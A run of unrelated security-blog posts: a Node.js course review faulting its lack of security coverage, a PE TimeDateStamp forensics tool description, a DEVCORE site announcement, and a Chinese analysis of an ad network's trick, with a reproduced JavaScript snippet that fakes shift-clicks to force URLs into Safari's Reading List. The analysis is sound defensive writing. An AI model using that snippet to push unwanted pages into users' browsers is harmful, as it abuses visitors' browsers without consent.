I won’t copy-paste the TOC, you can find it here. I think the covered topics are pretty goodm if you are a beginner in Node. The videos are also quiet good, very few slides, mostly code, terminal, and browser which fits to my taste :), however the code is not written in live, but copy-pasted which makes it for me and bit more difficult to follow, because I had to pause the video often to actually have time to read through the inserted code. It is at least better then, if it would be too slow and you have to wait for the video. Another annoying thing, in the UI, is that you cannot pause the video with the spacebar (which I think should be default for every media player).

Regarding the topics, as a rule-of-thumb you could say that for every mentioned topic it explained how to install, configure it, and one example is shown. If you already have this experience with any of the topic, you probably won’t learn anything new.

The narrator, to be honest I don’t know whether it is Joe Stanco or not, speaks clearly. The script of the course is clearly well prepared which has advantages and disadvantages. Good part is that is really clear and exact, bad is that it lacks fun and humour and most things are only defined exactly once. Which means if you don’t understand something from one sentence then you won’t have another chance. But this also makes the course shorter and not redundant.

Although the course doesn’t include exercises, the code of the examples are available, so you can try them out and play with them.

Security

Since I work in security I must take that in consideration as well. The course doesn’t talk about security at all, which makes me a bit sad. Of course you could say that this is not an advanced course and IT security is more complicated than that, however in my opinion security should be discussed on every level, at least so that the reader will be aware of the threats and that he has to deal with security. I think most of the people who will take this tutorial will start to write applications without taking any advanced course where security would be discussed, thus, they will be probably writing insecure applications as long as they get hacked or somebody tells them to take security seriously. That is why I think that no introductory course should exist without mentioning security.

Pros

  • Topics are good.
  • Example code is available.
  • Faster way to get to know Node, then reading a book.
  • Script is well written.
  • More code, less slides.
  • Explanations are mostly clear.

Cons

  • No automatic jump to next video.
  • No pause on spacebar.
  • Everything explained only once.
  • No excercises.
  • SECURITY IS NOT DISCUSSED.

Summary

I think this is a good course if you already know JavaScript but you are new to Node.js. Have fun with it if you decide to take it.

PE TimeDateStamp Viewer

In this this post, i will share with you a tiny tool that i wrote to discover all occurrences of TimeDateStamps in a PE executable. The tool simply traverses the PE header and specifically the following structures/fields:

1) The "TimeDateStamp" field of the "_IMAGE_FILE_HEADER" structure.

This is the most notorious field that is always a target for both malware authors and forensic guys.

N.B. Certain versions of Delphi linkers always emit a fixed TimeDateStamp of 0x2A425E19, Sat Jun 20 01:22:17 1992. In this case you should not rely on this field and continue looking in other fields.

2) The "TimeDateStamp" field of the "_IMAGE_EXPORT_DIRECTORY" structure.

It is usually the same as or very close to the "TimeDateStamp" field of the the "_IMAGE_FILE_HEADER" structure".

N.B. Not all linkers fill this field, but Microsoft Visual Studio linkers do fill it for both DLL's and EXE's.

3) The "TimeDateStamp" field of the "_IMAGE_IMPORT_DESCRIPTOR" structure.

Unlike what the name implies, this field is a bit useless if you are trying to determine when the executable was built. It is -1 if the executable/dll is bound (see #8) and zero if not. So, it is not implemented in my tool.

4) The "TimeDateStamp" field of the "_IMAGE_RESOURCE_DIRECTORY" structure.

Usually Microsoft Visual Studio linkers don't set it (I have tested with linker versions of 6.0, 8.0, 9.0,  and 10.0).

Borland C and Delphi set this field for the main _IMAGE_RESOURCE_DIRECTORY and its subdirectories.

Sometimes spoofers forget to forge this field for subdirectories.

5) The "TimeDateStamp" of the "_IMAGE_DEBUG_DIRECTORY" structures.

Microsoft Visual Studio linkers emitting debug info. in the final PE always set this field. Spoofers may forge the field in the first "_IMAGE_DEBUG_DIRECTORY" structure and forget the following ones.

N.B. Debug info as pointed to by Debug Data Directory is an array of  "_IMAGE_DEBUG_DIRECTORY" structures, each representing debug info of different type e.g. COFF, CodeView, etc.

6) If  "_IMAGE_DEBUG_DIRECTORY" has the "Type" field set to 0x2 (IMAGE_DEBUG_TYPE_CODEVIEW), then by following the "PointerToRawData" field we can find another occurrence of TimeDateStamp ( only if the PDB format is PDB 2.0 i.e when "Signature" field is set to "NB10" )


7) The "TimeDateStamp" field of the "_IMAGE_LOAD_CONFIG_DIRECTORY" structure.

I have not seen it being used before. However, it is  implemented in the tool.

8) The "TimeDateStamp" field of the "_IMAGE_BOUND_IMPORT_DESCRIPTOR" structures.

It is the TimeDateStamp of the DLL that the executable is bound to. We can't use this field to know when the executable was build, but we can use it to determine on which Windows version/Service pack the file was built/bound. It is not implemented in the tool.

The tool has a very simple command line. See below.

You download the tool from here. For any bugs or suggestions, please don't hesitate to leave me a comment or contant me @waleedassar.

GitHub Project here.

DEVCORE 新網站上線!

DEVCORE 的新網站上線了!
非常感謝專業的 EVENDESIGN 幫我們設計精美的網站!

我們目前主要服務項目為滲透測試、資安教育訓練、資安事件處理、資安顧問服務,
各項服務的詳細內容可參考 Services 頁面。

同時,在官網中我們將會不定期提供最新的資安新知及技術文章,
希望藉由我們的力量讓大眾更清楚資訊安全的重要。
並且透過站內的教學文獻,讓開發者、管理者進一步了解駭客的思維、攻防的手法,
知己知彼,才能百戰不怠。瞭解如何攻擊,更能知道如何防禦。

若對我們的網站內容或服務有任何建議,歡迎您隨時與我們聯繫。
希望我們能為您的企業資訊安全最佳把關者!
歡迎隨時聯絡我們! contact [at] devco.re

奇優廣告 Qiyou 廣告手法剖析

歡迎來到我們的技術文章專欄!

今天我們來談談「廣告顯示手法」。不少廣告商為了要增加廣告的曝光以及點擊率,會使用各種手法強迫使用者顯示廣告。例如彈出式視窗、內嵌廣告、強制跳轉等等。但這樣的手法有什麼好提的呢?今天有一個很特別的案例,讓我們來看看一個網站「1kkk.com 極速漫畫」。

奇優廣告 Qiyou 廣告手法剖析 - 1kkk.com 這是一個常見的網路漫畫網站,接著點擊進去漫畫頁面。 奇優廣告 Qiyou 廣告手法剖析 - 1kkk.com 漫畫頁面 網站中充斥著煩人的廣告,並且突然一閃而過 Safari 的「閱讀列表」動畫。怎麼會突然這樣呢?讓我們打開「閱讀列表」一探究竟。

奇優廣告 Qiyou 廣告手法剖析 - Safari 顯示閱讀側邊欄 奇優廣告 Qiyou 廣告手法剖析 - Safari 閱讀列表被放置廣告 URL

打開閱讀列表之後,我們赫然發現裡面被加了非常多廣告的頁面!

可以看以下影片示範:

這是怎麼做到的呢?就是一種利用 JavaScript 控制滑鼠點擊的變形應用。點選「網頁檢閱器」或是「開發者工具」,會看到一段奇怪的 JavaScript 控制滑鼠的點擊行為。

奇優廣告 Qiyou 廣告手法剖析 - 廣告 JavaScript

分析節錄後的 code 如下:

<!DOCTYPE html>
<html>
<head>
  <script>
    var force_add_url_to_readinglist = function (target_url) {
      try {
        var fake_element = document.createElement('a');
        fake_element.setAttribute('href', target_url);
        fake_element.setAttribute('style', 'display:none;');

        // https://developer.mozilla.org/en-US/docs/Web/API/event.initMouseEvent
        var fake_event = document.createEvent('MouseEvents');
        fake_event.initMouseEvent('click', false, false, window, 0, 0, 0, 0, 0, false, false, true, false, 0, null);
        fake_element.dispatchEvent(fake_event);

      } catch ( error ) {
        // nothing.
      }
    };

    var url = 'http://google.com/?' + Math.random().toString().substr(1);
    force_add_url_to_readinglist(url);
  </script>
</head>

<body>

  <h1>Test: FORCE_ADD_URL_TO_READINGLIST</h1>

</body>
</html>

利用「initMouseEvent」模擬滑鼠的點擊,在 URL 上按下 Shift 鍵點擊。在一般瀏覽器中是「開啟新視窗」,在 Safari 中則是「加入閱讀清單」了,因此形成廣告視窗不斷加入閱讀清單的現象。廣告商利用這種手法增加廣告的點擊率,只要瀏覽器沒有安裝阻擋廣告的套件或者是阻擋「彈出式視窗」,你就會成為流量的貢獻者。

經過我們的測試,Internet Explorer、Mozilla Firefox 不會受這類攻擊影響,Google Chrome、Opera 則會被內建的 Pop-up 視窗阻擋功能擋下。但若是直接模擬點擊,則全數瀏覽器都會受影響導向至 URL。雖然這種類型的攻擊不會造成實質上的損失跟危害,但若是結合其他惡意手法將可以造成攻擊。例如透過網站掛碼將使用者導向至惡意網站等等。

若要避免此類型攻擊,有以下幾個建議方案:

  1. 安裝 NoScript 類型套件,僅允許可信賴的網站執行 JavaScript
  2. 開啟「彈出式視窗」阻擋功能,並將網站安全性等級提高。
  3. 安裝 AdBlock 等廣告阻擋套件(但會影響網站營收)
  4. 使用最新版本瀏覽器以策安全

網頁型的攻擊越來越多樣化,除了依賴瀏覽器本身的保護並輔以第三方安全套件之外,更需要使用者本身的安全意識,才能安心暢快的瀏覽網路!

❌